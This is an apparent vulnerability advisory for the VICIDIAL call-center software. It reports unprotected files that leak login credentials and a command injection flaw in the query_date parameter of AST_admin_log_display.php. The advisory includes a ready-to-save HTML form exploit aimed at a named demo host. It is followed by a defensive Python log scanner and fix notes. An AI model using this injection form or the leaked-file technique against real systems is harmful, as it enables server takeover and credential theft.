VICIDIAL Vulnerability
VICIDIAL is a set of programs that are designed to interact with the Asterisk Open-Source PBX Phone system to act as a complete inbound/outbound call center suite. The agent interface is an interactive set of web pages that work through a web browser to give real-time information and functionality with nothing more than an internet browser on the client computer.
More information can be found at http://astguiclient.sourceforge.net/vicidial.html
Exploiting..
On the demo site, which we assume is a default install, the file project_auth_entries.txt does not seem to be protected from direct access, so it gives out valid usernames and passwords. More information can be obtained from the file admin_changes_log.txt.
Once we have a valid username and password, we can execute shell commands by exploiting the AST_admin_log_display.php script. An exploit would look something like this:
<form action="http://www.eflo.net/vicidial/AST_admin_log_display.php" method="get">
<input maxlength="500" size="50" value="1;$replace_this_with_your_cmd;" name="query_date">
<input type="submit" value="SUBMIT" name="SUBMIT">
</form>
Change the host and directory if needed and save it as an .htm file. Spaces would appear to be filtered.
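A log check for the two issues described above, as an added example that is not part of the original advisory: it flags requests for the exposed text files and any query_date value sent to AST_admin_log_display.php that is not a plain date. The combined access-log format, the YYYY-MM-DD date assumption, the finding labels and the sample entries are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Files the advisory reports as readable without authentication.
EXPOSED_FILES = ("project_auth_entries.txt", "admin_changes_log.txt")
SCRIPT = "AST_admin_log_display.php"
# Assumption: a legitimate query_date is a plain YYYY-MM-DD date.
VALID_DATE = re.compile(r"\d{4}-\d{2}-\d{2}")
# Request line and status code of a combined-format access-log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample entries (documentation IP ranges, CMD is a placeholder).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /vicidial/project_auth_entries.txt HTTP/1.1" 200 5120 "-" "curl/8.0"',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /vicidial/admin_changes_log.txt HTTP/1.1" 403 199 "-" "curl/8.0"',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /vicidial/AST_admin_log_display.php?query_date=1%3BCMD%3B&SUBMIT=SUBMIT HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET /vicidial/AST_admin_log_display.php?query_date=2024-01-01&SUBMIT=SUBMIT HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

def query_values(query, key):
    """Decoded values of `key`; split on '&' only so ';' stays in the value."""
    pairs = (p.partition("=") for p in query.split("&"))
    return [unquote_plus(v) for k, _, v in pairs if unquote_plus(k) == key]

def classify(line):
    """Return (finding, detail) tuples for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    parts, status = urlsplit(m.group(1)), m.group(2)
    name = parts.path.rsplit("/", 1)[-1]
    findings = []
    if name in EXPOSED_FILES:
        # Status 200 means the file contents were served to the client.
        kind = "exposed-file-read" if status == "200" else "exposed-file-probe"
        findings.append((kind, name))
    if name == SCRIPT:
        for value in query_values(parts.query, "query_date"):
            if not VALID_DATE.fullmatch(value):  # anything but a date is suspect
                findings.append(("suspicious-query_date", value))
    return findings

def scan(lines):
    """Map 1-based line number -> findings, skipping clean lines."""
    return {n: f for n, line in enumerate(lines, 1) if (f := classify(line))}

if __name__ == "__main__":
    for n, found in scan(SAMPLE_LOG).items():
        print(n, found)
```

The same allowlist pattern, applied server-side to query_date before it reaches any shell or query, is the corresponding fix; blocking direct web access to the two .txt files addresses the disclosure.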